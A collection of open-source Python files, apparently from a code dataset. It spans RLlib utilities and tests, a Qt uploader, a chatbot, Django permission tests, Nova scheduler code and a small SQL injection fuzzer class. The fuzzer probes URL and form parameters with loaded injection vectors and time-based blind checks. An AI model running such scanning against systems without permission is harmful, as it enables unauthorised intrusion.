tf1, tf, tfv = try_import_tf()
ray.init(num_cpus=10)
def train_and_export(algo_name, num_steps, model_dir, ckpt_dir, prefix):
cls = get_trainer_class(algo_name)
alg = cls(config={}, env="CartPole-v0")
for _ in range(num_steps):
alg.train()
# Export tensorflow checkpoint for fine-tuning
alg.export_policy_checkpoint(ckpt_dir, filename_prefix=prefix)
# Export tensorflow SavedModel for online serving
alg.export_policy_model(model_dir)
def restore_saved_model(export_dir):
signature_key = \
tf1.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
g = tf1.Graph()
with g.as_default():
with tf1.Session(graph=g) as sess:
meta_graph_def = \
tf1.saved_model.load(sess,
[tf1.saved_model.tag_constants.SERVING],
export_dir)
print("Model restored!")
print("Signature Def Information:")
print(meta_graph_def.signature_def[signature_key])
print("You can inspect the model using TensorFlow SavedModel CLI.")
print("https://www.tensorflow.org/guide/saved_model")
def restore_checkpoint(export_dir, prefix):
sess = tf1.Session()
meta_file = "%s.meta" % prefix
saver = tf1.train.import_meta_graph(os.path.join(export_dir, meta_file))
saver.restore(sess, os.path.join(export_dir, prefix))
print("Checkpoint restored!")
print("Variables Information:")
for v in tf1.trainable_variables():
value = sess.run(v)
print(v.name, value)
if __name__ == "__main__":
algo = "DQN"
model_dir = os.path.join(ray._private.utils.get_user_temp_dir(),
"model_export_dir")
ckpt_dir = os.path.join(ray._private.utils.get_user_temp_dir(),
"ckpt_export_dir")
prefix = "model.ckpt"
num_steps = 3
train_and_export(algo, num_steps, model_dir, ckpt_dir, prefix)
restore_saved_model(model_dir)
restore_checkpoint(ckpt_dir, prefix)
```
#### File: rllib/execution/segment_tree.py
```python
import operator
from typing import Any, Optional
class SegmentTree:
"""A Segment Tree data structure.
https://en.wikipedia.org/wiki/Segment_tree
Can be used as regular array, but with two important differences:
a) Setting an item's value is slightly slower. It is O(lg capacity),
instead of O(1).
b) Offers efficient `reduce` operation which reduces the tree's values
over some specified contiguous subsequence of items in the array.
Operation could be e.g. min/max/sum.
The data is stored in a list, where the length is 2 * capacity.
The second half of the list stores the actual values for each index, so if
capacity=8, values are stored at indices 8 to 15. The first half of the
array contains the reduced-values of the different (binary divided)
segments, e.g. (capacity=4):
0=not used
1=reduced-value over all elements (array indices 4 to 7).
2=reduced-value over array indices (4 and 5).
3=reduced-value over array indices (6 and 7).
4-7: values of the tree.
NOTE that the values of the tree are accessed by indices starting at 0, so
`tree[0]` accesses `internal_array[4]` in the above example.
"""
def __init__(self,
capacity: int,
operation: Any,
neutral_element: Optional[Any] = None):
"""Initializes a Segment Tree object.
Args:
capacity (int): Total size of the array - must be a power of two.
operation (operation): Lambda obj, obj -> obj
The operation for combining elements (eg. sum, max).
Must be a mathematical group together with the set of
possible values for array elements.
neutral_element (Optional[obj]): The neutral element for
`operation`. Use None for automatically finding a value:
max: float("-inf"), min: float("inf"), sum: 0.0.
"""
assert capacity > 0 and capacity & (capacity - 1) == 0, \
"Capacity must be positive and a power of 2!"
self.capacity = capacity
if neutral_element is None:
neutral_element = 0.0 if operation is operator.add else \
float("-inf") if operation is max else float("inf")
self.neutral_element = neutral_element
self.value = [self.neutral_element for _ in range(2 * capacity)]
self.operation = operation
def reduce(self, start: int = 0, end: Optional[int] = None) -> Any:
"""Applies `self.operation` to subsequence of our values.
Subsequence is contiguous, includes `start` and excludes `end`.
self.operation(
arr[start], operation(arr[start+1], operation(... arr[end])))
Args:
start (int): Start index to apply reduction to.
end (Optional[int]): End index to apply reduction to (excluded).
Returns:
any: The result of reducing self.operation over the specified
range of `self._value` elements.
"""
if end is None:
end = self.capacity
elif end < 0:
end += self.capacity
# Init result with neutral element.
result = self.neutral_element
# Map start/end to our actual index space (second half of array).
start += self.capacity
end += self.capacity
# Example:
# internal-array (first half=sums, second half=actual values):
# 0 1 2 3 | 4 5 6 7
# - 6 1 5 | 1 0 2 3
# tree.sum(0, 3) = 3
# internally: start=4, end=7 -> sum values 1 0 2 = 3.
# Iterate over tree starting in the actual-values (second half)
# section.
# 1) start=4 is even -> do nothing.
# 2) end=7 is odd -> end-- -> end=6 -> add value to result: result=2
# 3) int-divide start and end by 2: start=2, end=3
# 4) start still smaller end -> iterate once more.
# 5) start=2 is even -> do nothing.
# 6) end=3 is odd -> end-- -> end=2 -> add value to result: result=1
# NOTE: This adds the sum of indices 4 and 5 to the result.
# Iterate as long as start != end.
while start < end:
# If start is odd: Add its value to result and move start to
# next even value.
if start & 1:
result = self.operation(result, self.value[start])
start += 1
# If end is odd: Move end to previous even value, then add its
# value to result. NOTE: This takes care of excluding `end` in any
# situation.
if end & 1:
end -= 1
result = self.operation(result, self.value[end])
# Divide both start and end by 2 to make them "jump" into the
# next upper level reduce-index space.
start //= 2
end //= 2
# Then repeat till start == end.
return result
def __setitem__(self, idx: int, val: float) -> None:
"""
Inserts/overwrites a value in/into the tree.
Args:
idx (int): The index to insert to. Must be in [0, `self.capacity`[
val (float): The value to insert.
"""
assert 0 <= idx < self.capacity, f"idx={idx} capacity={self.capacity}"
# Index of the leaf to insert into (always insert in "second half"
# of the tree, the first half is reserved for already calculated
# reduction-values).
idx += self.capacity
self.value[idx] = val
# Recalculate all affected reduction values (in "first half" of tree).
idx = idx >> 1 # Divide by 2 (faster than division).
while idx >= 1:
update_idx = 2 * idx # calculate only once
# Update the reduction value at the correct "first half" idx.
self.value[idx] = self.operation(self.value[update_idx],
self.value[update_idx + 1])
idx = idx >> 1 # Divide by 2 (faster than division).
def __getitem__(self, idx: int) -> Any:
assert 0 <= idx < self.capacity
return self.value[idx + self.capacity]
class SumSegmentTree(SegmentTree):
"""A SegmentTree with the reduction `operation`=operator.add."""
def __init__(self, capacity: int):
super(SumSegmentTree, self).__init__(
capacity=capacity, operation=operator.add)
def sum(self, start: int = 0, end: Optional[Any] = None) -> Any:
"""Returns the sum over a sub-segment of the tree."""
return self.reduce(start, end)
def find_prefixsum_idx(self, prefixsum: float) -> int:
"""Finds highest i, for which: sum(arr[0]+..+arr[i - i]) <= prefixsum.
Args:
prefixsum (float): `prefixsum` upper bound in above constraint.
Returns:
int: Largest possible index (i) satisfying above constraint.
"""
assert 0 <= prefixsum <= self.sum() + 1e-5
# Global sum node.
idx = 1
# While non-leaf (first half of tree).
while idx < self.capacity:
update_idx = 2 * idx
if self.value[update_idx] > prefixsum:
idx = update_idx
else:
prefixsum -= self.value[update_idx]
idx = update_idx + 1
return idx - self.capacity
class MinSegmentTree(SegmentTree):
def __init__(self, capacity: int):
super(MinSegmentTree, self).__init__(capacity=capacity, operation=min)
def min(self, start: int = 0, end: Optional[Any] = None) -> Any:
"""Returns min(arr[start], ..., arr[end])"""
return self.reduce(start, end)
```
#### File: rllib/tests/test_execution.py
```python
import numpy as np
import time
import gym
import queue
import ray
from ray.rllib.agents.ppo.ppo_tf_policy import PPOTFPolicy
from ray.rllib.evaluation.worker_set import WorkerSet
from ray.rllib.evaluation.rollout_worker import RolloutWorker
from ray.rllib.execution.common import STEPS_SAMPLED_COUNTER, \
STEPS_TRAINED_COUNTER
from ray.rllib.execution.concurrency_ops import Concurrently, Enqueue, Dequeue
from ray.rllib.execution.metric_ops import StandardMetricsReporting
from ray.rllib.execution.replay_ops import StoreToReplayBuffer, Replay
from ray.rllib.execution.rollout_ops import ParallelRollouts, AsyncGradients, \
ConcatBatches, StandardizeFields
from ray.rllib.execution.train_ops import TrainOneStep, ComputeGradients, \
AverageGradients
from ray.rllib.execution.replay_buffer import LocalReplayBuffer, \
ReplayActor
from ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID, SampleBatch
from ray.util.iter import LocalIterator, from_range
from ray.util.iter_metrics import SharedMetrics
def iter_list(values):
return LocalIterator(lambda _: values, SharedMetrics())
def make_workers(n):
local = RolloutWorker(
env_creator=lambda _: gym.make("CartPole-v0"),
policy_spec=PPOTFPolicy,
rollout_fragment_length=100)
remotes = [
RolloutWorker.as_remote().remote(
env_creator=lambda _: gym.make("CartPole-v0"),
policy_spec=PPOTFPolicy,
rollout_fragment_length=100) for _ in range(n)
]
workers = WorkerSet._from_existing(local, remotes)
return workers
def test_concurrently(ray_start_regular_shared):
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin")
assert c.take(6) == [1, 4, 2, 5, 3, 6]
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="async")
assert c.take(6) == [1, 4, 2, 5, 3, 6]
def test_concurrently_weighted(ray_start_regular_shared):
a = iter_list([1, 1, 1])
b = iter_list([2, 2, 2])
c = iter_list([3, 3, 3])
c = Concurrently(
[a, b, c], mode="round_robin", round_robin_weights=[3, 1, 2])
assert c.take(9) == [1, 1, 1, 2, 3, 3, 2, 3, 2]
a = iter_list([1, 1, 1])
b = iter_list([2, 2, 2])
c = iter_list([3, 3, 3])
c = Concurrently(
[a, b, c], mode="round_robin", round_robin_weights=[1, 1, "*"])
assert c.take(9) == [1, 2, 3, 3, 3, 1, 2, 1, 2]
def test_concurrently_output(ray_start_regular_shared):
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin", output_indexes=[1])
assert c.take(6) == [4, 5, 6]
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin", output_indexes=[0, 1])
assert c.take(6) == [1, 4, 2, 5, 3, 6]
def test_enqueue_dequeue(ray_start_regular_shared):
a = iter_list([1, 2, 3])
q = queue.Queue(100)
a.for_each(Enqueue(q)).take(3)
assert q.qsize() == 3
assert q.get_nowait() == 1
assert q.get_nowait() == 2
assert q.get_nowait() == 3
q.put("a")
q.put("b")
q.put("c")
a = Dequeue(q)
assert a.take(3) == ["a", "b", "c"]
def test_metrics(ray_start_regular_shared):
workers = make_workers(1)
workers.foreach_worker(lambda w: w.sample())
a = from_range(10, repeat=True).gather_sync()
b = StandardMetricsReporting(
a, workers, {
"min_iter_time_s": 2.5,
"timesteps_per_iteration": 0,
"metrics_smoothing_episodes": 10,
"collect_metrics_timeout": 10,
})
start = time.time()
res1 = next(b)
assert res1["episode_reward_mean"] > 0, res1
res2 = next(b)
assert res2["episode_reward_mean"] > 0, res2
assert time.time() - start > 2.4
workers.stop()
def test_rollouts(ray_start_regular_shared):
workers = make_workers(2)
a = ParallelRollouts(workers, mode="bulk_sync")
assert next(a).count == 200
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 200, counters
a = ParallelRollouts(workers, mode="async")
assert next(a).count == 100
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_rollouts_local(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
assert next(a).count == 100
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_concat_batches(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="async")
b = a.combine(ConcatBatches(1000))
assert next(b).count == 1000
timers = b.shared_metrics.get().timers
assert "sample" in timers
def test_standardize(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="async")
b = a.for_each(StandardizeFields([SampleBatch.EPS_ID]))
batch = next(b)
assert abs(np.mean(batch[SampleBatch.EPS_ID])) < 0.001, batch
assert abs(np.std(batch[SampleBatch.EPS_ID]) - 1.0) < 0.001, batch
def test_async_grads(ray_start_regular_shared):
workers = make_workers(2)
a = AsyncGradients(workers)
res1 = next(a)
assert isinstance(res1, tuple) and len(res1) == 2, res1
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_train_one_step(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(TrainOneStep(workers))
batch, stats = next(b)
assert isinstance(batch, SampleBatch)
assert DEFAULT_POLICY_ID in stats
assert "learner_stats" in stats[DEFAULT_POLICY_ID]
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
assert counters[STEPS_TRAINED_COUNTER] == 100, counters
timers = a.shared_metrics.get().timers
assert "learn" in timers
workers.stop()
def test_compute_gradients(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(ComputeGradients(workers))
grads, counts = next(b)
assert counts == 100, counts
timers = a.shared_metrics.get().timers
assert "compute_grads" in timers
def test_avg_gradients(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(ComputeGradients(workers)).batch(4)
c = b.for_each(AverageGradients())
grads, counts = next(c)
assert counts == 400, counts
def test_store_to_replay_local(ray_start_regular_shared):
buf = LocalReplayBuffer(
num_shards=1,
learning_starts=200,
buffer_size=1000,
replay_batch_size=100,
prioritized_replay_alpha=0.6,
prioritized_replay_beta=0.4,
prioritized_replay_eps=0.0001)
assert buf.replay() is None
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(StoreToReplayBuffer(local_buffer=buf))
next(b)
assert buf.replay() is None # learning hasn't started yet
next(b)
assert buf.replay().count == 100
replay_op = Replay(local_buffer=buf)
assert next(replay_op).count == 100
def test_store_to_replay_actor(ray_start_regular_shared):
actor = ReplayActor.remote(
num_shards=1,
learning_starts=200,
buffer_size=1000,
replay_batch_size=100,
prioritized_replay_alpha=0.6,
prioritized_replay_beta=0.4,
prioritized_replay_eps=0.0001)
assert ray.get(actor.replay.remote()) is None
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(StoreToReplayBuffer(actors=[actor]))
next(b)
assert ray.get(actor.replay.remote()) is None # learning hasn't started
next(b)
assert ray.get(actor.replay.remote()).count == 100
replay_op = Replay(actors=[actor])
assert next(replay_op).count == 100
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
``` |
{
"source": "77ph/mcl",
"score": 3
} |
#### File: mcl/misc/snark-p.py
```python
p=21888242871839275222246405745257275088696311157297823662689037894645226208583
print("over 253 bit")
for i in range (10):
print(i, (p * i) >> 253)
def maxarg(x):
return x // p
print("maxarg")
for i in range(16):
print(i, maxarg(i << 253))
x=0x2c130429c1d4802eb8703197d038ebd5109f96aee333bd027963094f5bb33ad
y = x * 9
print(hex(y))
``` |
{
"source": "77Sera/Ali-PicBed",
"score": 3
} |
#### File: 77Sera/Ali-PicBed/class_mainwindow.py
```python
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from ui_mainwindow import Ui_MainWindow
from oss_manager import OssManager
from my_utils import *
from pyperclip import copy
class MainWindow(QtWidgets.QWidget, Ui_MainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.setupUi(self)
self.label_upload_status.setText("")
self.om = self.load_om(config_file="default.config") # 载入OssManager类
# 按钮 btn_upload_file 绑定 upload_file 函数
self.btn_upload_file.clicked.connect(self.upload_file)
# 按钮 btn_copy_url 绑定 copy_url 函数
self.btn_copy_url.clicked.connect(self.copy_url)
# 按钮 btn_copy_url_md 绑定 copy_url_md 函数
self.btn_copy_url_md.clicked.connect(self.copy_url_md)
def copy_url(self):
'''
获取LineEdit中的文本并复制到剪贴板
'''
text = self.text_url.text()
copy(text)
def copy_url_md(self):
'''
获取LineEdit中的文本并以markdown格式复制到剪贴板
'''
text = "".format(self.text_url.text())
copy(text)
def upload_file(self):
file_path = self.select_file() # 获取要上传的文件名
if file_path:
self.label_upload_status.setText("上传中...")
try:
target_path = self.om.upload_file(file_path)
self.text_url.setText(target_path)
self.label_upload_status.setText("上传成功!")
except Exception as e:
QMessageBox.warning(self,
"ERROR",
"\n\t\tUpload Failed!\t\n\n\tPlease Check Your Config and Run again.\t\t\n\n",
QMessageBox.StandardButtons(QMessageBox.Close))
self.label_upload_status.setText("")
print_error(e, other_string="[!] Upload Failed - {}".format(file_path))
def select_file(self):
file_path = QFileDialog.getOpenFileName(self, '选择文件')[0]
return file_path
def load_om(self, config_file):
configs = load_config(config_file)
return OssManager(
endpoint=configs["endpoint"],
bucket_domain_name=configs["bucket_domain_name"],
bucket_name=configs["bucket_name"],
accesskey_id=configs["accesskey_id"],
accesskey_secret=configs["accesskey_secret"]
)
``` |
{
"source": "77Sera/Vegetable-Fuzzer",
"score": 3
} |
#### File: 77Sera/Vegetable-Fuzzer/class_fuzzer.py
```python
import requests
import time
from my_utils import * # Fuzzer类依赖于my_utils的方法
class Fuzzer():
def __init__(self, url, headers={} ):
self.url = url
self.headers = headers
self.count = 0 # 设置发现的漏洞数
def start_fuzz(self):
'''
TODO: 对输入url做GET型的,各种漏洞检测
'''
print("[*] start fuzzing...")
self.fuzz_sql() # 测试sql注入
def fuzz_sql( self, method='g', threshold=100, postdata={} ):
'''
TODO: SQL 注入检测,数字型,字符型,报错,盲注
'''
# base_url 是基准url,query_list是查询字符串用 & 切割后的数组
base_url, query_list = analyze_url(self.url)
sql_fuzz_vectors = load_vector('data/sql_fuzz.data') # 载入攻击向量
time_based_vectors = load_vector('data/sql_fuzz_time_based.data')
sleep_time = 10 # 设置时间盲注检测时间
for m in method:
if m == 'g': # GET型注入测试
weight_length = self.pre_weight_length(self.url) # 载入初始权重
q_len = len(query_list)
for i in range(q_len):
query_string1 = "&".join(query_list[:i])+"&" if i != 0 else ""
query_string2 = "&"+"&".join(query_list[i+1:]) if i+1 != q_len else ""
for vector in sql_fuzz_vectors:
query_string = "{0}{1}{2}{3}".format( query_string1, query_list[i], vector, query_string2 )
final_url = "{0}?{1}".format(base_url, query_string)
req = requests.get( final_url, headers=self.headers )
# 测试是否存在注入
r = self.check_sql_fuzz( req, weight_length, threshold )
if r: print( "[*] Payload => {0}".format( req.url ) )
if not self.count:
for vector in time_based_vectors:
query_string = "{0}{1}{2}{3}".format( query_string1, query_list[i], vector.replace("*index*", str(sleep_time) ), query_string2 )
final_url = "{0}?{1}".format(base_url, query_string)
try:
req = requests.get( final_url, headers=self.headers, timeout=sleep_time-5 )
except Exception as e:
print("[*] Payload => {0}".format(final_url) )
elif m == 'p': # POST型注入
weight_length = self.pre_weight_length(self.url, method='p', postdata=postdata) # 载入初始权重
for k,v in postdata.items():
for vector in sql_fuzz_vectors:
temp = v
postdata[k]+=vector
req = requests.post( self.url, headers=self.headers, data=postdata )
# 测试是否存在注入
r = self.check_sql_fuzz( req, weight_length, threshold )
if r: print("[*] Payload => {0} | URL => {1}".format( form_postdata(postdata),self.url ) )
postdata[k] = temp
if not self.count:
for vector in time_based_vectors:
temp = v
try:
postdata[k]+=vector
req = requests.post( self.url, headers=self.headers, data=postdata, timeout=sleep_time-5 )
except Exception as e:
if r: print("[*] Payload => {0} | URL => {1}".format( form_postdata(postdata),self.url ) )
finally:
postdata[k] = temp
def check_sql_fuzz(self, req, weight_length, threshold=100 ):
'''
维护一个全局数字,每次响应加权平均,超过阈值则显示为 发现漏洞
'''
content_length = len( req.text ) # 粗略估计返回的页面大小
if abs( content_length - weight_length ) <= threshold:
weight_length = ( content_length + weight_length ) // 2
r = False
else:
self.count+=1
r = True
return r
def pre_weight_length(self, url, method='g', postdata={} ):
'''
先取得正常响应下的返回长度,以此来计算加权的值
输入:string => url
'''
if method == 'g':
req = requests.get( url, headers=self.headers )
elif method == 'p':
req = requests.post( url, headers=self.headers, data=postdata )
return len( req.text )
# set方法
def set_url(self, url):
'''
设置类的URL属性 string
'''
self.url = url
def set_headers(self, headers):
'''
设置类的HEADERS属性 dict
'''
self.headers = headers
def set_cookie(self, cookie):
'''
设置类的HEADERS属性 string
'''
self.headers["Cookie"] = cookie
def set_threshold(self, threshold):
'''
设置类的THRESHOLD属性 (阈值) int
'''
self.threshold = threshold
```
#### File: 77Sera/Vegetable-Fuzzer/my_utils.py
```python
def load_vector(target_file):
'''
TODO: 从文件中载入指定攻击向量
输入:string => target_file
输出:list => string list[x]
'''
vectors = []
with open( target_file, 'r', encoding="utf8" ) as file:
for line in file:
vectors.append( line.replace("\n","") )
return vectors
def analyze_url(url):
'''
TODO: 将url解析成 base_url(无查询字符串,问号),list(查询字符串中的键=值)
输入: string => url
输出: string => base_url; list => query_list | [ "key=value",... ]
'''
tmp = url.split("#")[0].split("?")
base_url = tmp[0]
if len(tmp) == 2: # 正常情况下,比如有查询字符串
query_list = tmp[1].split("&") # 获取查询字符串中的键值对
# query_list = [ s.split("=") for s in query_string ]
elif len(tmp) == 1: # 没有查询字符串的情况下
query_list = []
else:
exit(0)
return base_url, query_list
def form_postdata(postdata):
'''
TODO: 将字典类型的postdata值转换成常规字符串类型
输入: dict => {"key":"value","key2":"value2",...}
输出: string => "key=value&key2=value2&..."
'''
r = []
for kv in postdata.items():
r.append( "=".join(kv) )
return "&".join(r)
``` |
{
"source": "77stm77/Houston-bot",
"score": 2
} |
#### File: Houston-bot/houston_bot/handlers.py
```python
import json
import apiai
from config import BaseConfig
class BotHandlers(BaseConfig):
"""Handler bot. """
def start(self, bot, update):
"""Starting message. """
bot.send_message(chat_id=update.message.chat_id, text=self.welcome_text)
def message(self, bot, update):
"""Dialog message. """
request = apiai.ApiAI(self.dialog_token).text_request()
request.lang = self.lang
request.session_id = self.name
request.query = update.message.text
response_json = json.loads(request.getresponse().read().decode('utf-8'))
response = response_json['result']['fulfillment']['speech']
if response:
bot.send_message(chat_id=update.message.chat_id, text=response)
else:
bot.send_message(chat_id=update.message.chat_id, text=self.answer)
``` |
{
"source": "780Farva/django_guardian_playground",
"score": 2
} |
#### File: users/migrations/0005_make_admins_group.py
```python
from django.db import migrations
def apply_add_admin_group(apps, schema_editor):
Group = apps.get_model("auth", "Group")
admins_group = Group.objects.create(name=u"admins")
CustomUser = apps.get_model("users", "CustomUser")
staff = CustomUser.objects.filter(is_staff=True)
admins_group.user_set.add(*staff)
def revert_add_admin_group(apps, schema_editor):
Group = apps.get_model("auth", "Group")
admins_group = Group.objects.filter(name__in=[u"admins"])
admins_group.user_set.clear()
admins_group.delete()
class Migration(migrations.Migration):
dependencies = [
("auth", "0011_update_proxy_permissions"),
("users", "0004_customuser_remove_uuid_null"),
]
operations = [migrations.RunPython(apply_add_admin_group, revert_add_admin_group)]
```
#### File: users/tests/test_models.py
```python
from django.contrib.auth import get_user_model
from django.test import TestCase
from users.models import CustomUser
from users.models import get_anonymous_user_instance
class AnonymousUserPermissionsTest(TestCase):
def setUp(self):
self.other_user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.anonymous = get_user_model().objects.get(email="<EMAIL>")
def test_anonymous_permissions(self):
# anonymous users can sign up new users
# handled by modelbackend, not guardian
# self.assertTrue(self.anonymous.has_perm("add_customuser"))
# anonymous users can't do anything else to users, really.
self.assertFalse(self.anonymous.has_perm("add_permission"))
self.assertFalse(self.anonymous.has_perm("change_permission"))
self.assertFalse(self.anonymous.has_perm("delete_permission"))
self.assertFalse(self.anonymous.has_perm("view_permission"))
self.assertFalse(self.anonymous.has_perm("change_customuser", self.other_user))
self.assertFalse(self.anonymous.has_perm("delete_customuser", self.other_user))
self.assertFalse(self.anonymous.has_perm("view_customuser", self.other_user))
class CustomUserPermissionsTest(TestCase):
def setUp(self):
admin = CustomUser.objects.create_superuser(
email="<EMAIL>", password="<PASSWORD>"
)
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
other_user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
# Request the users again to ensure the cached permissions on them get busted
self.admin = CustomUser.objects.get(email=admin.email)
self.user = CustomUser.objects.get(email=user.email)
self.other_user = CustomUser.objects.get(email=other_user.email)
def test_admin_permissions(self):
self.assertTrue(self.admin.has_perm("add_user"))
self.assertTrue(self.admin.has_perm("add_customuser"))
self.assertTrue(self.admin.has_perm("add_permission"))
self.assertTrue(self.admin.has_perm("change_permission"))
self.assertTrue(self.admin.has_perm("delete_permission"))
self.assertTrue(self.admin.has_perm("view_permission"))
self.assertTrue(self.admin.has_perm("change_customuser", self.user))
self.assertTrue(self.admin.has_perm("delete_customuser", self.user))
self.assertTrue(self.admin.has_perm("view_customuser", self.user))
self.assertTrue(self.admin.has_perm("change_customuser", self.other_user))
self.assertTrue(self.admin.has_perm("delete_customuser", self.other_user))
self.assertTrue(self.admin.has_perm("view_customuser", self.other_user))
def test_user_permissions(self):
# normal users can't add users
self.assertFalse(self.user.has_perm("add_user"))
self.assertFalse(self.user.has_perm("add_customuser"))
# normal users can't add users mess with permissions
self.assertFalse(self.user.has_perm("add_permission"))
self.assertFalse(self.user.has_perm("change_permission"))
self.assertFalse(self.user.has_perm("delete_permission"))
self.assertFalse(self.user.has_perm("view_permission"))
self.assertFalse(self.user.has_perm("add_permission", self.user))
self.assertFalse(self.user.has_perm("change_permission", self.user))
self.assertFalse(self.user.has_perm("delete_permission", self.user))
self.assertFalse(self.user.has_perm("view_permission", self.user))
# check that normal users have model permissions
self.assertTrue(self.user.has_perm("users.change_customuser"))
self.assertTrue(self.user.has_perm("users.delete_customuser"))
self.assertTrue(self.user.has_perm("users.view_customuser"))
# normal users can change and delete themselves, once guardian has given them permission
self.assertTrue(self.user.has_perm("change_customuser", self.user))
self.assertTrue(self.user.has_perm("delete_customuser", self.user))
self.assertTrue(self.user.has_perm("view_customuser", self.user))
self.assertTrue(self.user.has_perm("users.change_customuser", self.user))
self.assertTrue(self.user.has_perm("users.delete_customuser", self.user))
self.assertTrue(self.user.has_perm("users.view_customuser", self.user))
# normal users can't change other users or their permissions
self.assertFalse(self.user.has_perm("change_customuser", self.other_user))
self.assertFalse(self.user.has_perm("delete_customuser", self.other_user))
self.assertFalse(self.user.has_perm("view_customuser", self.other_user))
self.assertFalse(self.user.has_perm("add_permission", self.other_user))
self.assertFalse(self.user.has_perm("change_permission", self.other_user))
self.assertFalse(self.user.has_perm("delete_permission", self.other_user))
self.assertFalse(self.user.has_perm("view_permission", self.other_user))
class CustomUserUuidTest(TestCase):
def test_username_is_email(self):
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.assertEqual(user.USERNAME_FIELD, "email")
def test_user_gets_uuid(self):
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.assertIsNotNone(user.uuid)
class AnonyousUserTest(TestCase):
def test_returns_anonymous_user(self):
user = get_anonymous_user_instance(CustomUser)
self.assertEqual(user.email, "<EMAIL>")
self.assertFalse(user.is_staff)
```
#### File: project/users/views.py
```python
from rest_framework.permissions import DjangoObjectPermissions
from rest_framework.viewsets import ModelViewSet
from users.models import CustomUser
from users.serializers import CustomUserSerializer
class CustomObjectPermissions(DjangoObjectPermissions):
"""
Similar to `DjangoObjectPermissions`, but adding 'view' permissions.
"""
perms_map = {
"GET": ["%(app_label)s.view_%(model_name)s"],
"OPTIONS": ["%(app_label)s.view_%(model_name)s"],
"HEAD": ["%(app_label)s.view_%(model_name)s"],
"POST": ["%(app_label)s.add_%(model_name)s"],
"PUT": ["%(app_label)s.change_%(model_name)s"],
"PATCH": ["%(app_label)s.change_%(model_name)s"],
"DELETE": ["%(app_label)s.delete_%(model_name)s"],
}
class CustomUserViewSet(ModelViewSet):
"""
A simple ViewSet for listing or retrieving users.
"""
lookup_field = "uuid"
# must match exactly this regex pattern, including hyphens in their particular places
lookup_value_regex = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
serializer_class = CustomUserSerializer
def get_queryset(self):
user = self.request.user
if user.is_staff:
return CustomUser.objects.all()
return CustomUser.objects.filter(email=user.email)
permission_classes = [CustomObjectPermissions]
``` |
{
"source": "781778304/nova",
"score": 2
} |
#### File: nova/scheduler/rpcapi.py
```python
from nova import flags
import nova.openstack.common.rpc.proxy
FLAGS = flags.FLAGS
class SchedulerAPI(nova.openstack.common.rpc.proxy.RpcProxy):
'''Client side of the scheduler rpc API.
API version history:
1.0 - Initial version.
'''
BASE_RPC_API_VERSION = '1.0'
def __init__(self):
super(SchedulerAPI, self).__init__(topic=FLAGS.scheduler_topic,
default_version=self.BASE_RPC_API_VERSION)
def run_instance(self, ctxt, topic, request_spec, admin_password,
injected_files, requested_networks, is_first_time,
filter_properties, reservations, call=True):
rpc_method = self.call if call else self.cast
return rpc_method(ctxt, self.make_msg('run_instance', topic=topic,
request_spec=request_spec, admin_password=<PASSWORD>,
injected_files=injected_files,
requested_networks=requested_networks,
is_first_time=is_first_time,
filter_properties=filter_properties,
reservations=reservations))
def prep_resize(self, ctxt, topic, instance_uuid, instance_type_id, image,
update_db, request_spec, filter_properties):
self.cast(ctxt, self.make_msg('prep_resize', topic=topic,
instance_uuid=instance_uuid, instance_type_id=instance_type_id,
image=image, update_db=update_db, request_spec=request_spec,
filter_properties=filter_properties))
def show_host_resources(self, ctxt, host):
return self.call(ctxt, self.make_msg('show_host_resources', host=host))
def live_migration(self, ctxt, block_migration, disk_over_commit,
instance_id, dest, topic):
# NOTE(comstud): Call vs cast so we can get exceptions back, otherwise
# this call in the scheduler driver doesn't return anything.
return self.call(ctxt, self.make_msg('live_migration',
block_migration=block_migration,
disk_over_commit=disk_over_commit, instance_id=instance_id,
dest=dest, topic=topic))
def update_service_capabilities(self, ctxt, service_name, host,
capabilities):
self.fanout_cast(ctxt, self.make_msg('update_service_capabilities',
service_name=service_name, host=host,
capabilities=capabilities))
def get_host_list(self, ctxt):
return self.call(ctxt, self.make_msg('get_host_list'))
```
#### File: virt/disk/guestfs.py
```python
import os
from nova import exception
from nova import utils
from nova.virt.disk import mount
class Mount(mount.Mount):
"""libguestfs support for arbitrary images."""
mode = 'guestfs'
def map_dev(self):
self.mapped = True
return True
def unmap_dev(self):
self.mapped = False
